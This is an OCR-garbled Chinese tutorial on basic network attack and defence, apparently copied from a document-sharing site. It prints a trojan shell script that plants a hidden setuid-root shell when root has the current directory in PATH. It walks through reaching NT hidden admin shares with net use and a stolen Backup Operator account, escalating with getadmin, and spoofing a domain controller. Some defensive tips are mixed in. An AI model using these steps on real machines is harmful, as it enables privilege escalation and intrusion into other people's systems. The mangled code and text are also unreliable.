《网络攻防基础教程》由会员分享,可在线阅读,更多相关《网络攻防基础教程(11页珍藏版)》请在金锄头文库上搜索。
1、网络攻防的基础教程制作:shaokejian单机安全你有一台电脑,平时用来上上网,玩玩游戏,偶尔也敲点公文进去,你认为它挺安全的, 但有一天,你的朋友突然告诉你,他有你的上网帐号和密码,你相信吗?一一不要不信,这 种方法挺多的,假如你用的是WINDOWS,假如你拨号上网的密码写了保存,那任何人只 要在你的电脑上运行某个小软件就C我从来不保存什么密码一一你可能要得意的说,但一一你的朋友在你电脑里装了一个木 马,可以捕捉拨号网络那个“连接到”的Caption,然后记下你所按的键盘,悄悄地将文件写 入一个加密过的文本后再自动退出一一会点编程的人应该都做得到,你的电脑是不是失守 了?设了屏幕保护密码一
2、一天啊,重启动后还有什么?设定了管理策略,用策略编辑器编辑过,如果不输密码他就进不了,进去了也什么都干 不成!把你的user.dat和system.dat删掉后用我的代替,这个主意你认为怎么样?当然我不是让你杯弓蛇影弄得一个朋友都没有只能形影相吊一一这样活着太没劲啦!如果你的电脑没有机密资讯的话当然无所谓,如果有一一保证尽量少的人接触它!写了这么多都是WIN9X的,UNIX系统里这方面的问题是不是就少了呢?从物理方面来 说,如果一台机器摆放的位置不安全,能让人有足够的时间打开机箱做一些手脚,你的机器 就无法安全,就拿我的机子来说吧,我有两块硬盘,但在WIN9X和NT里都看不到第二块 硬盘的影子
3、我把它装上了 LINUX,而且只能从一个特定的地方启动它,启动之后,在 LINUX下,我可以任意的用mount命令装其它操作系统里的所有数据一扫而空局域网安全P基于同样的道理,局域网中的电脑在物理上仍然要严加控制,同时还要经常性地注意局 域网中用户的一些非正常的举动一一为什么?这还用问,就拿我身边的例子来说吧,我有个 朋友,公司里三十多台电脑连成一个局域网,但这家伙总想弄到主机的最高权限,于是乎监 听SMB密文、安装木马忙得不亦乐乎一一最后呢,当然得手了,毕竟是我的哥们嘛:)还有,比如在UNIX中最好要限制ROOT只能由主控台(console)登录、要谨慎使用su 命令等等,不然都会给同一网域
4、内的一群“虎视眈眈”想获取最高权限者以机会.辟如说:shell环境变量PATH中包含用冒号分开的目录名清单,shell按照清单中给定的 顺序搜索这些目录,找出运行的命令的可执行文件,PATH变量的典型内容如下:3 打隆色兵园$ echo $ PATH.:/usr/local/bin:/bin:/usr/bin/:/usr/X11/bin但如果你是ROOT的话,无论如何要把PATH变量从当前目录开始搜索的设置去掉,不 然请考虑下面的可能性:甲请你过去在他的终端上做某些管理员职能,你去了,su成ROOT, 执行用户要求你做的系统命令后退出ROOT帐号一一无懈可击,但如果用户将在他的目录 下做了一个
5、假的su程序那么你是从当前目录也就是甲的目录开始搜索的,天啊,你执 行的是一个根本不知情的程序,可能是用户自己编写的特洛伊程序,用以记录你的密码.根据上面的原理,你看看如果ROOT不去掉本地目录的话,下面这段代码可能有什么用 处吧-、#!/bin/shcp /bin/sh ./stuff/junk/.superdudechmod 4555 ./stuff/junk/.superduderm -f $0: / exec /bin/ls $ 1+$Xr然后% cd% chmod 700.X % touch ,/-f明白了吗?这个ls建立了一个隐藏的setuid root的shell的copy远程安
6、全与黑客常用方法1、针对个人用户个人用户在网上最常遇到的“侵略性”的行为不外乎以下几种垃圾邮件这是一个永恒但又无奈的话题,垃圾邮件包括了诸如一些赚钱、广告之类 的信件和恶意的人们通过邮件炸弹发来“成吨重”的信件,这不需要任何技巧,也最是无 聊一一我收到的此类信件多如牛毛呀!对付此类信件远程登陆删除就行了,也没有必要非查 出该发信人的行踪再施以报复一一网上这种东西太多,可谓野火烧不尽.然后在信箱配置 上设定拒收某些人、或者超大的信件就行了,这种垃圾不在我们的讨论范围之内。蓝屏炸弹 这是针对WIN95的OOB漏洞而开发出来的一些小软件,多命名为*NUKE 等等,以前是专门攻击139端口,被攻击的计
7、算机多会出现M$著名的蓝屏蓝屏错误,WIN98 下此漏洞已经PATCH上,所以大多数NUKE软件都已失效了,但最近听说一个叫VOOB 的软件对WIN98仍然有效一一我还没试过呢,要不要拿你开刀?该软件界面如下:(此类软件界面大抵如此,使用简单无比)要防范此类软件的攻击,一个土办法就是监听端口,网上有许多监听端口的软件,你只要设定好监听的PORT,一旦有人企图向这个端口发送信息包 就会被记录下来,然后人&%人&*,抓到他后,你自己看着办吧共享文件 这个问题网络里有相当多的安全人士已经提过无数次了,但.我每次扫 描一个C类地址群的时候都能发现一大群人依旧开着共享没有任何防护而且自得其乐,很 抱歉,
8、我看过其中一些人的信、图片甚至更加机密的.你的电脑里是不是有这样的托着磁 盘的小手呢?有的话可要小心了,你开着共享呢,也就是说,下面的方法对你来说相当有效.1、本地攻击c$、d$、admin$和 print$这些共享是很危险的.但是出于某些原因不愿意详细提及危险 在何处.众所周知,NT安装以后,将每个磁盘自动分配一个共享,c$,d$和e$等.这些共享是隐 藏的共享,在网上邻居是看不到它们的.另外还有admin$,ipc$,打印机共享后,还会生成 print$ 这个共享.微软说这些共享是为管理而设置的,且最好不要删除.实际上,这些c$共享资源都是可访问的,只不过需要一点权限.而print$则一般
9、任何人都可 以访问. (7缺省地,要访问c$,需要backup operator以上的权限,即需要文件的备份权限.假设你的NT 域内有一个帐号是benny,NT的ip是192.168.0.1,他是Backup operator,而你得到了这个帐号 的密码,那么,你就可以通过网络访问NT服务器的c盘,而不管c盘有没有被共享.方法如下:在运行命令中输入O文件:/192.168.0.1/c$则一个包含c盘所有文件的窗口将会弹出来.或者 net use z:文件:/192.168.0.1/c$则NT server上的c:盘就被映射为本地的z:盘.缺省地,你对这些目录将具有完全控制的权限,你可以用NT入
10、侵升级版的方法,把getadmin 的文件传到c盘来取得Administrator权限.另外,对于file:/192.168.0.1/print$不需要backup operator的权限就能完全控制2、远程攻击本地攻击的这个技巧很多人都知道,下面来谈谈远程攻击这个毛病是可以用来远程攻击的!假设有一台 server 是 http:/ file:/ 后会出现一个对话框,要你输入密码(但并不要你输入密码)其实这是一个幌子,maybe微软的开发人员留了一个公用密码,否则,哪有不需要ID就提示 输入密码的?上面,我们提到,在局域网内,只要是backup operator以上级别的人输入这条命令,就不会
11、有 密码输入对话框出现,而会直接弹出暴露c盘所有文件和目录的窗口.如果你有Backup operator以上的权限,用域欺骗的方法,可以远程访问C盘,并且在缺省情 况下受到你的完全控制!-、c盘文件被控制的风险就是系统完全被控制发现的步骤: f如上所述,要打开file:/ 是通过TCP/IP如何在NT的Lan内登录?我产生了一个欺骗这个NT域的念头,即,我在本地 设置一个与http:/ 的域的名称相同的主域控制器,假设http:/ /的域的名 称叫xxx,则我将自己本地主域控制器的域名也改成xxx,并且也设置一个benny的帐号和密 码.K然后拨号上网,再输入file:/ -Ahttp:/ 能
12、检查NetBIOS的当前佳话状态,也可以把表项从LMHOSTS文件添加到NetBIOS名字高 速缓存中,或者检验注册的NetBIOS名和分配给你的计算机的NetBIOS作用域,与NETSTAT 不同的是它只处理NetBIOS连接,而NETSTAT处理你的系统与其它计算机的全部连接。当然,用这篇Retina的文献中提到的方法,也可以获得其域的名称.本文的基础是要获得Backup Operator的权限,结果是能获取Administrator权 限,Local/Remote 都有效.但是,print$个目录是不需要什么权限的,任何人都能访问.因为几乎所有的NT机器的c$目录是打开的,而且就算有人把
13、这个共享删除了,机器重新启 动后又会被自动打开,所以这个安全问题是很严重的.关于域欺骗的问题,是微软的安全漏洞 无疑.在这里看到,本文还要用到其它的hack技巧如nbtstat和getadmin,成功入侵一台NTserver是要用到很多知识的.看了之后是不是觉得心惊肉跳一一你硬盘上的文件全在别人的掌握之中!这种感觉不太 好吧,呵,所以如果不是必要的话呢,WIN98文件及打印共享的选项就不要开了,NT下最 好对NetBIOS作个限制,要开的话找个安全工具,比如LOCKDOWN2000,汉化后界 面如下:该软件用法相当简单,可以实时监控他人同你的电脑的连接试试你就知道了。还有些人可能会说一一我是拨
14、号上网,动态IP,就算共享又怎么样?请问你有没有用 ICQ? ICQ不是有“隐身人”的作用吗?有些人又不服了一一唉,那你就开着吧,告诉我你的 ICQ 号.木马侵袭说到木马很多人的第一反应就是BO,不错,BO的确是迄今为止水平最高的一个木马程 序了一一对了,要解释一下什么是木马吗?就是远程控制软件啦! 一个客户端,一个服务器 端,两边都装好后在客户端就可以访问远程的服务器了,之所以称其为木马,是因为它往往 是在服务器端不知情的情况下被装入的一一就是说,你一不小心,就“对外开放”了。网上木马程序很流行,其实说来也很简单,大致都是修改注册表或者INI文件加载一个 文件提供服务,这就手工都很容易检测出木马来。一,看增加的不明服务。二,因为木马是 作为服务一般要打开一个网络通信端口,所以检查增加的服务端口也很容易检查出木马程序 来。其实完全可以稍微改动操作系统内核而作出一个很好的木马来,这样不用改动注册表也 可以让用户很不容易发觉。(比如说将木马做进某个驱动程序里面,就人&*%$,咱们劳苦大众 Tk想手工检测可就不容易了.)现在流行的一些木马多将自身复制到某个文件夹下隐藏起来,但它要运行就得自启动, 所以检查注册表 HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentvisionrun
